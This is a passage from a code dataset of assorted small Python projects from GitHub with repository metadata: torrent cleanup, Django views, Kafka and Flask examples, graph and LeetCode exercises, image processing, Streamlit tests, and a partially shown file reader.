dictTorrentFiles[torrentFile]['downloadedFiles'] = root + '/' + file\n\n\n # adding torrents to tracker and move them to proper location\n for key in dictTorrentFiles.keys():\n if 'downloadedFiles' in dictTorrentFiles[key]:\n ## !!! UNCOMMENT TO EXECUTE (SUBPROCESS)\n # Add torrent file if it's downloaded\n fileToDownload = dictTorrentFiles[key]['filePath'] + '\\\\' + dictTorrentFiles[key]['fileName']\n dirToDownload = 'C:/Users/test/Downloads/'\n cmdAddTorrent = f'C:/Users/test/AppData/Roaming/uTorrent/uTorrent.exe /DIRECTORY \"{dirToDownload}\" \"{fileToDownload}\"'\n print(cmdAddTorrent)\n # subprocess.Popen(cmdAddTorrent)\n time.sleep(5)\n\n ## !!! UNCOMMENT TO EXECUTE (SUBPROCESS)\n # Move torrent file to flash card\n cmdMvFile = f'MOVE \"{fileToDownload}\" \"C:\\\\tmp\\\\\"'\n print(cmdMvFile)\n # subprocess.run(cmdMvFile, shell=True)\n time.sleep(5)\n\n # To check\n # for key in dictTorrentFiles.keys():\n # if 'downloadedFiles' in dictTorrentFiles[key]:\n # print(f\"torrent:\\t\\t{dictTorrentFiles[key]['fileName']}\\nfiles:\\t\\t\\t{dictTorrentFiles[key]['localFiles']}\")\n # print(f\"download:\\t\\t{dictTorrentFiles[key]['downloadedFiles']}\")\n # print(f\"single?:\\t\\t{dictTorrentFiles[key]['singleFile']}\\n\")\n\n\n finishTimer = time.perf_counter()\n print(f\"Finished in {round(finishTimer-startTimer, 2)} second(s)\")\n\nif __name__ == '__main__':\n main()","repo_name":"egoryunov/torrents_cleanup","sub_path":"torrents_cleanup.py","file_name":"torrents_cleanup.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26177204234","text":"from django.shortcuts import render\nfrom django.views.generic import CreateView\n\nfrom .models import TestScaleItModel, TestCropItModel\n\n# Create your views here.\nclass TestScaleItView(CreateView):\n model = TestScaleItModel\n template_name = \"test_view.html\"\n fields = ['image']\n\n\nclass TestCropItView(CreateView):\n model = TestCropItModel\n template_name = \"test_view.html\"\n fields = ['image']","repo_name":"byite/django-imageit","sub_path":"tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"70358508396","text":"# import pandas as pd\r\n# from sklearn.model_selection import train_test_split\r\n# data = pd.read_csv(\"Crop_recommendation.csv\")\r\n# label = data[\"label\"]\r\n# data = data.drop(\"label\",axis=1)\r\n# X_train,x_test,y_train,y_test = 
train_test_split(data,label,random_state=0,test_size=.20)\r\n# # print(len(X_train))\r\n# # print(len(x_test))\r\n# # print(len(y_train))\r\n# # print(len(y_test))\r\n# from sklearn.svm import SVC\r\n# from sklearn.ensemble import AdaBoostClassifier\r\n# model =SVC(kernel='rbf')\r\n# model.fit(X_train,y_train)\r\n# y_pred = model.predict(x_test)\r\n# from sklearn.metrics import accuracy_score\r\n#\r\n# accuracy = accuracy_score(y_test,y_pred)\r\n# print(accuracy)\r\nimport numpy as np\r\narray = np.array([62,52,16,22.27526694,58.84015925,6.9670577620000005,63.87020584])\r\narray = array.reshape(1,-1)\r\nprint(array)\r\nimport pickle as pk\r\n# file = open(\"trained_model.pkl\",\"ab\")\r\n# pk.dump(model,file)\r\n# file.close()\r\nmodel = pk.load(open(\"trained_model.pkl\",\"rb\"))\r\ngive = model.predict(array)\r\nprint(give)","repo_name":"anup-66/MACHINE-LEARNING-PROJECTS","sub_path":"geeks_geeks_hackathon/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16101978778","text":"from datetime import datetime\nfrom zoneinfo import ZoneInfo\n\n\ndef run():\n data_czas_today = datetime.today()\n data_czas_now = datetime.now()\n now_wwa = datetime.now(tz=ZoneInfo('Europe/Warsaw'))\n now_ny = datetime.now(tz=ZoneInfo('America/New_York'))\n\n print(data_czas_today)\n print(data_czas_now)\n print(now_wwa)\n print(now_ny)\n\n print(now_wwa == now_ny)\n print(now_wwa.replace(microsecond=0) == now_ny.replace(microsecond=0))\n\n \nif __name__ == '__main__':\n run()\n","repo_name":"keinam53/Python_Wtajemniczenie","sub_path":"05_Strefy_czasowe/2_Obiekty_aware/Przyklad.py","file_name":"Przyklad.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"5881296956","text":"class DeployDataHolder(object):\n def __init__(self, d):\n for a, b in d.items():\n if isinstance(b, dict):\n setattr(self, a, DeployDataHolder(b))\n elif isinstance(b, list):\n items = [self._create_obj_by_type(item) for item in b]\n setattr(self, a, items)\n else:\n setattr(self, a, self._create_obj_by_type(b))\n\n @staticmethod\n def _create_obj_by_type(obj):\n obj_type = type(obj)\n if obj_type == dict:\n return DeployDataHolder(obj)\n if obj_type == list:\n return [DeployDataHolder._create_obj_by_type(item) for item in obj]\n if DeployDataHolder._is_primitive(obj):\n return obj_type(obj)\n return obj\n\n @staticmethod\n def _is_primitive(thing):\n primitive = (int, str, bool, float, unicode)\n return isinstance(thing, primitive)\n\n @classmethod\n def create_from_params(cls, template_model, datastore_name, vm_cluster_model, ip_regex, refresh_ip_timeout,\n auto_power_on, auto_power_off, wait_for_ip, auto_delete):\n \"\"\"\n :param VCenterTemplateModel template_model:\n :param str datastore_name:\n :param VMClusterModel vm_cluster_model:\n :param str ip_regex: Custom regex to filter IP addresses\n :param refresh_ip_timeout:\n :param bool auto_power_on:\n :param bool auto_power_off:\n :param bool wait_for_ip:\n :param bool auto_delete:\n \"\"\"\n dic = {\n 'template_model': template_model,\n 'datastore_name': datastore_name,\n 'vm_cluster_model': vm_cluster_model,\n 'ip_regex': ip_regex,\n 'refresh_ip_timeout': refresh_ip_timeout,\n 'auto_power_on': auto_power_on,\n 'auto_power_off': auto_power_off,\n 'wait_for_ip': wait_for_ip,\n 'auto_delete': auto_delete\n }\n return 
cls(dic)\n","repo_name":"QualiSystems/vCenterShell","sub_path":"package/cloudshell/cp/vcenter/models/DeployDataHolder.py","file_name":"DeployDataHolder.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"73"} +{"seq_id":"35523534067","text":"lst=[]\n\nfor i in range(10):\n n=eval(input())\n lst.append(n)\n \ns=sum(lst)\ns=s - max(lst)-min(lst)\n\na=s/8\n\nprint(s)\nprint(f'{a:.2f}')","repo_name":"GMO517/practise","sub_path":"GMO/python/PYA/pya605.py","file_name":"pya605.py","file_ext":"py","file_size_in_byte":142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31869483712","text":"import json\nfrom kafka import KafkaConsumer, KafkaProducer\n\nORDER_KAFKA_TOPIC= \"order_details\"\nORDER_CONFIRMED_KAFKA_TOPIC= \"order_confirmed\"\n\"\"\"\nqhat the trasnactions.py file does is it receives a particular order detail from the kafka producer, reads it\nfrom the topic, decodes it, and sends back the required data points to a producer, writing to a new topic that confirms \norders\"\"\"\nconsumer= KafkaConsumer(\n ORDER_KAFKA_TOPIC,\n bootstrap_servers= \"localhost:29092\"\n)\n\nproducer= KafkaProducer(\n bootstrap_servers= \"localhost:29092\"\n)\n\nprint(\"listening started\")\n\nwhile True:\n for message in consumer:\n consumed_message= json.loads(message.value.decode())\n print(consumed_message)\n user_id= consumed_message[\"user_id\"]\n total_cost= consumed_message[\"total_cost\"]\n \n data= {\n \"customer_id\": user_id,\n \"customer_email\": f'{user_id}@gmail.com',\n \"total_cost\": total_cost\n }\n \n print(\"successful transaction...\")\n \n producer.send(\n ORDER_CONFIRMED_KAFKA_TOPIC, json.dumps(data).encode(\"utf-8\")\n )","repo_name":"echewisi/kafka_ordering_system","sub_path":"transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36140135787","text":"#imports\r\nfrom flask import Flask, request\r\n\r\n#init app\r\napp = Flask(__name__)\r\n\r\n#homepage \r\n@app.route('/')\r\ndef getIP():\r\n ip_add = request.remote_addr #.remote_add gets local IP\r\n return '

IP: ' + ip_add\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"Adhitya3011/FlaskExercises","sub_path":"IP ADDRESS APP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39166264814","text":"import itertools\n# From problem https://leetcode.com/problems/circle-and-rectangle-overlapping/description/\n\nclass Solution:\n def in_rect(corners: tuple[int, int, int, int], point: tuple[int, int]) -> bool:\n x1, y1, x2, y2 = corners\n x, y = point\n # Has to be included in both dimensions\n return x1 <= x and x <= x2 and y1 <= y and y <= y2\n def in_semi(semi: tuple[tuple[int, int], tuple[int, int]], r2: int, point: tuple[int, int]) -> bool:\n (right, cx), (up, cy) = semi\n x, y = point\n if right and x < cx or not right and x > cx:\n # Has to be to the right side of the quarter circle/s quarter-cutting radius vectors\n return False\n if up and y < cy or not up and y > cy:\n # Has to be to the right side of the quarter circle/s quarter-cutting radius vectors\n return False\n # Has to be close enough\n return (cx - x)**2 + (cy - y)**2 <= r2\n def checkOverlap(self, r: int, xCenter: int, yCenter: int, x1: int, y1: int, x2: int, y2: int) -> bool:\n # They overlap if the circle's center is in the rounded rectangle around the rectangle or if the\n # rectangle's center is in some sort of other relation with the circle... let's do the firs one\n horiz_cross = (x1 - r, y1, x2 + r, y2)\n vert_cross = (x1, y1 - r, x2, y2 + r)\n rects = [horiz_cross, vert_cross]\n semis = list(itertools.product(enumerate([x1, x2]), enumerate([y1, y2])))\n center = (xCenter, yCenter)\n r2 = r**2\n return (\n any([Solution.in_rect(rect, center) for rect in rects]) or\n any([Solution.in_semi(semi, r2, center) for semi in semis])\n )","repo_name":"4gatepylon/gists","sub_path":"Algos/Leetcode/Dec23MediumsTest/CircleSquareIntersect.py","file_name":"CircleSquareIntersect.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37597984054","text":"import os\nimport unittest\nfrom unittest.mock import PropertyMock, mock_open, patch\n\nimport pytest\n\nimport streamlit as st\nfrom streamlit.connections import BaseConnection\nfrom streamlit.runtime.secrets import AttrDict\n\nMOCK_TOML = \"\"\"\n[connections.my_mock_connection]\nfoo=\"bar\"\n\"\"\"\n\n\nclass MockRawConnection:\n def some_raw_connection_method(self):\n return \"some raw connection method\"\n\n\nclass MockConnection(BaseConnection[str]):\n def _connect(self, **kwargs) -> str:\n return MockRawConnection()\n\n def some_method(self):\n return \"some method\"\n\n\nclass BaseConnectionDefaultMethodTests(unittest.TestCase):\n def setUp(self) -> None:\n # st.secrets modifies os.environ, so we save it here and\n # restore in tearDown.\n self._prev_environ = dict(os.environ)\n\n def tearDown(self) -> None:\n os.environ.clear()\n os.environ.update(self._prev_environ)\n st.secrets._reset()\n\n def test_instance_set_to_connect_return_value(self):\n assert isinstance(\n MockConnection(\"my_mock_connection\")._instance, MockRawConnection\n )\n\n def test_getattr_works_with_methods_on_connection(self):\n assert MockConnection(\"my_mock_connection\").some_method() == \"some method\"\n\n def test_getattr_friendly_error_message(self):\n with pytest.raises(AttributeError) as e:\n 
MockConnection(\"my_mock_connection\").some_raw_connection_method()\n\n assert (\n str(e.value)\n == \"`some_raw_connection_method` doesn't exist here, but you can call `._instance.some_raw_connection_method` instead\"\n )\n assert (\n MockConnection(\"my_mock_connection\")._instance.some_raw_connection_method()\n == \"some raw connection method\"\n )\n\n def test_getattr_totally_nonexistent_attr(self):\n with pytest.raises(AttributeError) as e:\n MockConnection(\"my_mock_connection\").totally_nonexistent_method()\n\n assert (\n str(e.value)\n == \"'MockConnection' object has no attribute 'totally_nonexistent_method'\"\n )\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_secrets_property(self, _):\n conn = MockConnection(\"my_mock_connection\")\n assert conn._secrets.foo == \"bar\"\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_secrets_property_no_matching_section(self, _):\n conn = MockConnection(\"nonexistent\")\n assert conn._secrets == {}\n\n def test_secrets_property_no_secrets(self):\n conn = MockConnection(\"my_mock_connection\")\n assert conn._secrets == {}\n\n def test_instance_prop_caches_raw_instance(self):\n conn = MockConnection(\"my_mock_connection\")\n conn._raw_instance = \"some other value\"\n\n assert conn._instance == \"some other value\"\n\n def test_instance_prop_reinitializes_if_reset(self):\n conn = MockConnection(\"my_mock_connection\")\n conn._raw_instance = None\n\n assert isinstance(conn._instance, MockRawConnection)\n\n def test_on_secrets_changed_when_nothing_changed(self):\n conn = MockConnection(\"my_mock_connection\")\n\n # conn.reset() shouldn't be called because secrets haven't changed since conn\n # was constructed.\n with patch(\n \"streamlit.connections.base_connection.BaseConnection.reset\"\n ) as patched_reset:\n conn._on_secrets_changed(\"unused_arg\")\n patched_reset.assert_not_called()\n\n def test_on_secrets_changed(self):\n conn = MockConnection(\"my_mock_connection\")\n\n with patch(\n \"streamlit.connections.base_connection.BaseConnection.reset\"\n ) as patched_reset, patch(\n \"streamlit.connections.base_connection.BaseConnection._secrets\",\n PropertyMock(return_value=AttrDict({\"mock_connection\": {\"new\": \"secret\"}})),\n ):\n conn._on_secrets_changed(\"unused_arg\")\n patched_reset.assert_called_once()\n\n def test_repr_html_(self):\n repr_ = MockConnection(\"my_mock_connection\")._repr_html_()\n\n assert (\n \"st.connection my_mock_connection built from `tests.streamlit.connections.base_connection_test.MockConnection`\"\n in repr_\n )\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_repr_html_with_secrets(self, _):\n repr_ = MockConnection(\"my_mock_connection\")._repr_html_()\n\n assert (\n \"st.connection my_mock_connection built from `tests.streamlit.connections.base_connection_test.MockConnection`\"\n in repr_\n )\n assert \"Configured from `[connections.my_mock_connection]`\" in repr_\n","repo_name":"streamlit/streamlit","sub_path":"lib/tests/streamlit/connections/base_connection_test.py","file_name":"base_connection_test.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":28590,"dataset":"github-code","pt":"73"} +{"seq_id":"16079361338","text":"import csv\n\"\"\"\nf = open('music.csv')\ndata = csv.reader(f)\nheading = next(data)\nfor row in data:\n print(row)\n\nprint(heading)\nf.close()\n\"\"\"\n\nwhile True:\n choice = input(\"Enter choice [R/W/X]\").lower() \n if 
choice == 'r':\n sr_no = int(input(\"Sr_no: \"))\n try:\n f = open(\"music.csv\")\n reader = csv.reader(f)\n next(reader)\n data = []\n for row in reader:\n data.append(row)\n f.close()\n except FileNotFoundError:\n print(\"No such file exists. First create it.\")\n else:\n print(\"Sr_no: \"+data[sr_no][0])\n print(\"Album: \"+data[sr_no][1])\n print(\"Artist: \"+data[sr_no][2])\n print(\"Genre: \"+data[sr_no][3])\n elif choice == 'w':\n album = input(\"Album: \")\n artist = input(\"Artist: \")\n genre = input(\"Genre: \")\n try:\n f = open(\"music.csv\", \"x\")\n f.write(\"Sr.No.,Album,Artist,Genre\")\n f.close()\n except FileExistsError:\n pass\n f = open(\"music.csv\")\n reader = csv.reader(f)\n data = []\n for row in reader:\n data.append(row)\n f.close()\n srNo = len(data) - 1\n data.append([f'\"{srNo}\",\"{album}\",\"{artist}\",\"{genre}\"'])\n f = open(\"music.csv\",\"w\")\n for album_list in data:\n f.writelines(album_list)\n f.write('\\n')\n f.close() \n elif choice=='x':\n break\n\n\n# Next Class: Resource Management\n\n\n","repo_name":"alakhpandya/Ritu_Kapadiya_Surat","sub_path":"Python/mar18.py","file_name":"mar18.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70113586157","text":"import torch\nimport torch.nn as nn\n\nclass ResBlock(nn.Module):\n def __init__(self):\n super(ResBlock, self).__init__()\n k3n64s1 = nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=3//2)\n bn2d = nn.BatchNorm2d(num_features=64)\n \n self.block = nn.Sequential(\n k3n64s1,\n bn2d,\n nn.PReLU(),\n k3n64s1,\n bn2d\n )\n \n def forward(self, x):\n identity = x\n out = self.block(x)\n out += identity\n return out\n \nclass Upsampler(nn.Module):\n def __init__(self):\n super(Upsampler, self).__init__()\n \n self.upsample = nn.Sequential(\n nn.Conv2d(in_channels=64, out_channels=256, kernel_size=3, stride=1, padding=3//2),\n nn.PixelShuffle(2),\n nn.PReLU()\n )\n \n def forward(self, x):\n x = self.upsample(x)\n \n return x\n \n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n B = 5\n \n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=9, stride=1, padding=9//2),\n nn.PReLU()\n )\n \n block = [ResBlock() for _ in range(B)]\n self.block = nn.Sequential(*block)\n \n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=3//2),\n nn.BatchNorm2d(64)\n )\n \n upsample = [Upsampler() for _ in range(3)]\n self.upsample = nn.Sequential(*upsample)\n \n \n self.conv3 = nn.Conv2d(in_channels=64, out_channels=3, kernel_size=9, stride=1, padding=9//2)\n \n \n def forward(self,x):\n #x =x.permute(0, 3, 1, 2)\n x = self.conv1(x)\n x_res = x ##Residual\n x = self.block(x)\n x = self.conv2(x)\n x += x_res\n x = self.upsample(x)\n x = self.conv3(x)\n \n return x\n \nif __name__ == \"__main__\":\n G = Generator()\n input_x = torch.rand(1,32,32,3)\n print(input_x.shape)\n \n y = G(input_x)\n print(y.size())","repo_name":"HunbeomBak/srgan","sub_path":"models/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70395839275","text":"from PIL import Image\nimport os, errno\nimport image_slicer\nfrom shutil import move\n\nnew_width, new_height = 1280, 720\nnumber_of_slices = 
4\nsourceDirectory='/Users/kris/Downloads/football1'\ndestinationDirectory='/Users/kris/Downloads/football2-resized2'\n\nif not os.path.exists(destinationDirectory):\n os.makedirs(destinationDirectory + '/slices')\n os.makedirs(destinationDirectory + '/resized')\n\n# Slice images one by one and copy them to the new directory\nfor filename in os.listdir(sourceDirectory):\n if filename.endswith(\".jpg\"):\n print(\"Slicing: {0}\".format(os.path.join(sourceDirectory, filename)))\n pre, ext = os.path.splitext(filename)\n tiles = image_slicer.slice(os.path.join(sourceDirectory, filename), number_of_slices, save=False)\n image_slicer.save_tiles(tiles, directory=destinationDirectory + '/slices', prefix=pre)\n\n\nfor filename in os.listdir(destinationDirectory + '/slices'):\n if filename.endswith(\".png\"):\n print(\"Resizing: {0}\".format(os.path.join(destinationDirectory + '/slices', filename)))\n img = Image.open(os.path.join(destinationDirectory + '/slices', filename))\n img = img.resize((new_width, new_height), Image.ANTIALIAS)\n img.save(os.path.join(destinationDirectory + '/resized', filename))\n continue\n else:\n continue\n\nprint('Done!')\n","repo_name":"Basavarajingalagi/Python","sub_path":"xml files/detectnet-tests-master/resize-img.py","file_name":"resize-img.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39112104356","text":"## Default modules imported. Import more if you need to.\n\nimport numpy as np\nfrom skimage.io import imread, imsave\n\n# Fill this out\n# X is input 8-bit grayscale image\n# Return equalized image with intensities from 0-255\ndef histeq(X):\n\thist,bins = np.histogram(X.flatten(),256,normed=True)\n\tcdf = hist.cumsum()\n\tcdf = cdf * 255 / cdf[-1]\n\tim2 = np.interp(X.flatten(),bins[:-1],cdf)\n\treturn cdf.reshape(X.shape)\n \n\n########################## Support code below\n\nfrom os.path import normpath as fn # Fixes window/linux path conventions\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimg = imread(fn('inputs/p2_inp.png'))\n\nout = histeq(img)\n\nout = np.maximum(0,np.minimum(255,out))\nout = np.uint8(out)\nimsave(fn('outputs/prob2.png'),out)\n","repo_name":"huluhululiu/computer-vision","sub_path":"pset1/code/prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27653118536","text":"#1438. 
Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit\nclass Solution:\n def longestSubarray(self, nums: List[int], limit: int) -> int:\n \n ## improved version of sliding window with two deques to get min/max\n ## time O(n), space O(n)\n \n l, r = 0, 0\n from collections import deque \n #Approach: Using deques as calculating max,min for each subarray is costly\n min_q = deque()\n max_q = deque()\n \n #STEP1: Iterate subarrays using window of l to r \n while r < len(nums):\n n = nums[r] #Get current element\n \n #STEP2: If current element < last element of min queue, pop it(REPEAT)\n while min_q and n < nums[min_q[-1]]:\n min_q.pop()\n \n #STEP3: If current element > last element of max queue, pop it(REPEAT)\n while max_q and n > nums[max_q[-1]]:\n max_q.pop()\n \n #---- Now queue satisfies insertion of current element ------\n \n #STEP4: Add index of current element to both queues at the last\n min_q.append(r)\n max_q.append(r)\n \n #STEP5: Get max and min values in current subarray\n max_e = nums[max_q[0]]\n min_e = nums[min_q[0]]\n \n #STEP6: If it violates limit, shrink the window from left\n if max_e - min_e > limit:\n l += 1\n #STEP7: We had previously considered the value we discarded, now we need to update our queues. So pop any index before current window\n while min_q and min_q[0] < l:\n min_q.popleft()\n while max_q and max_q[0] < l:\n max_q.popleft()\n r += 1\n \n #STEP8 Return the size of the current window.\n return (r-l)\n \n #r - l because r has increased by 1 already, no need to do r-l+1\n \n \n \n \n \n \n ## sliding window\n ## O(n**2) in worst case, space O(n)\n from collections import deque \n left, right = 0, 0\n window, win_min, win_max=defaultdict(int), float('inf'), float('-inf')\n out= float('-inf')\n while right limit:\n if window[nums[left]]==1:\n window.pop(nums[left])\n if nums[left]==win_min: win_min=min(window.keys())\n elif nums[left]==win_max: win_max=max(window.keys()) \n else:\n window[nums[left]]-=1\n\n left+=1 \n out=max(out, right-left)\n\n return out\n","repo_name":"jianhui-ben/leetcode_python","sub_path":"1438. Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit.py","file_name":"1438. 
Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4569472569","text":"from flask import Blueprint, jsonify, json\nfrom flask_restful import Api, Resource\n\nfrom order.modules.order.model import Order,orders_schema,order_schema\n\norder = Blueprint(\n 'order', #name of module\n __name__,\n template_folder='templates' # templates folder\n)\napi = Api(order)\n\n\nclass OrderApi(Resource):\n def get(self):\n data = Order.query.all()\n result = orders_schema.dump(data)\n return jsonify({'order': result.data})\n\n\nclass OrderGet(Resource):\n def get(self, id):\n data = Order.query.filter_by(id=id)\n result = orders_schema.dump(data)\n return jsonify({'order': result.data})\n\n\napi.add_resource(OrderApi,'/')\napi.add_resource(OrderGet,'/')\n","repo_name":"rezandry/flask-blueprint-docker-compose","sub_path":"order/modules/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"42009204763","text":"from collections import defaultdict\n\ndef make_undirected_graph(edge_list):\n \"\"\" Makes an undirected graph from a list of edge tuples. \"\"\"\n graph = defaultdict(set)\n for e in edge_list:\n graph[e[0]].add(e[1])\n graph[e[1]].add(e[0])\n return graph\n\n\n\ndef reachable(graph, start_node):\n \"\"\"\n Returns:\n the set of nodes reachable from start_node\n \"\"\"\n result = set(start_node)\n frontier = set(start_node)\n while len(frontier) != 0:\n front = frontier.pop()\n for i in graph[front]:\n if i not in result:\n result.add(i)\n frontier.add(i)\n return list(result)\n\ndef test_reachable():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert sorted(reachable(graph, 'A')) == ['A', 'B', 'C', 'D']\n\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert sorted(reachable(graph, 'A')) == ['A', 'B', 'C', 'D']\n assert sorted(reachable(graph, 'E')) == ['E', 'F', 'G']\n\n\n\ndef connected(graph):\n if len(graph) == 0:\n return True\n p = 0\n for i in graph:\n p = i\n break\n lst = reachable(graph, p)\n node = set()\n for i in graph:\n for j in i:\n node.add(j)\n if len(node) == len(lst):\n return True\n else:\n return False\n\ndef test_connected():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert connected(graph) == True\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert connected(graph) == False\n\n\ndef n_components(graph):\n \"\"\"\n Returns:\n the number of connected components in an undirected graph\n \"\"\"\n ans = 0\n node = [i for i in graph]\n useNode = set()\n for i in node:\n if i in useNode:\n continue\n ans += 1\n lst = reachable(graph, i)\n for j in lst:\n useNode.add(j)\n return ans\n\n\n\ndef test_n_components():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert n_components(graph) == 1\n\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert n_components(graph) == 
2","repo_name":"allan-tulane/sp22-recitation-08-Alphardovo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23103553812","text":"\"\"\"Untilities for reading data for the Glass and writing it into the Glass Working Directory\"\"\"\n\nimport os\nimport zlib\nimport bitarray\nimport diffpatch\n\nfrom PIL import Image, PyAccess\nfrom data_types import DataEntry\nfrom bitarray.util import ba2int\n\n\nclass Reader:\n \"\"\"The Reader is an class that can read the current Glass Code and store it's data into classes.\"\"\"\n\n def __init__(self):\n \"\"\"Create a Reader, that can read the current Glass Code and store it's data into classes.\"\"\"\n self.data_strips = []\n\n if os.path.isfile(\"glass.code.png\"):\n self.image = Image.open(\"glass.code.png\")\n self.pixel_map = self.image.load()\n\n self.reading_data_strip = False\n self.data_strip_position = []\n self.data_strip_index = 0\n\n for row in range(self.image.size[1]):\n if self.pixel_map[1, row] == 0 and not self.reading_data_strip:\n self.reading_data_strip = True\n self.data_strip_position.append(row)\n\n elif self.pixel_map[1, row] == 255 and self.reading_data_strip:\n self.reading_data_strip = False\n self.data_strip_position.append(row)\n\n self.data_strips.append(DataStrip(self, self.data_strip_position, self.data_strip_index))\n self.data_strip_position.clear()\n self.data_strip_index += 1\n\n def read(self, writeToDisk: bool = False):\n \"\"\"\n Read data from the Glass and store it in classes.\n If `writeToDisk` is set `False`, it will return a JSON object containing the files,\n if it's set to `True`, it will write the files into the Glass Working Directory.\n \"\"\"\n full_data = {}\n\n data_strip: DataStrip\n for data_strip in self.data_strips:\n for data_entry in data_strip.Data.entries:\n if data_entry.entry_type == \"diff\":\n diff = data_entry.data\n\n if data_entry.action == \"+\":\n if data_entry.path in full_data:\n contents = diffpatch.apply_patch(full_data[data_entry.path][\"data\"], diff)\n else:\n full_data[data_entry.path] = {}\n contents = diffpatch.apply_patch(\"\", diff)\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n full_data[data_entry.path][\"data\"] = contents\n elif data_entry.entry_type == \"binary\":\n contents = data_entry.data\n full_data[data_entry.path] = {}\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n full_data[data_entry.path][\"data\"] = contents\n elif data_entry.entry_type == \"dir\":\n full_data[data_entry.path] = {}\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n\n old_full_data = full_data.copy()\n full_data.clear()\n\n for path in old_full_data:\n if old_full_data[path][\"entry_type\"] == \"dir\":\n full_data[path] = old_full_data[path]\n\n for path in old_full_data:\n if old_full_data[path][\"entry_type\"] != \"dir\":\n full_data[path] = old_full_data[path]\n\n if writeToDisk:\n for path in full_data:\n entry = full_data[path]\n\n if entry[\"action\"] == \"+\":\n if entry[\"entry_type\"] == \"diff\":\n with open(path, 
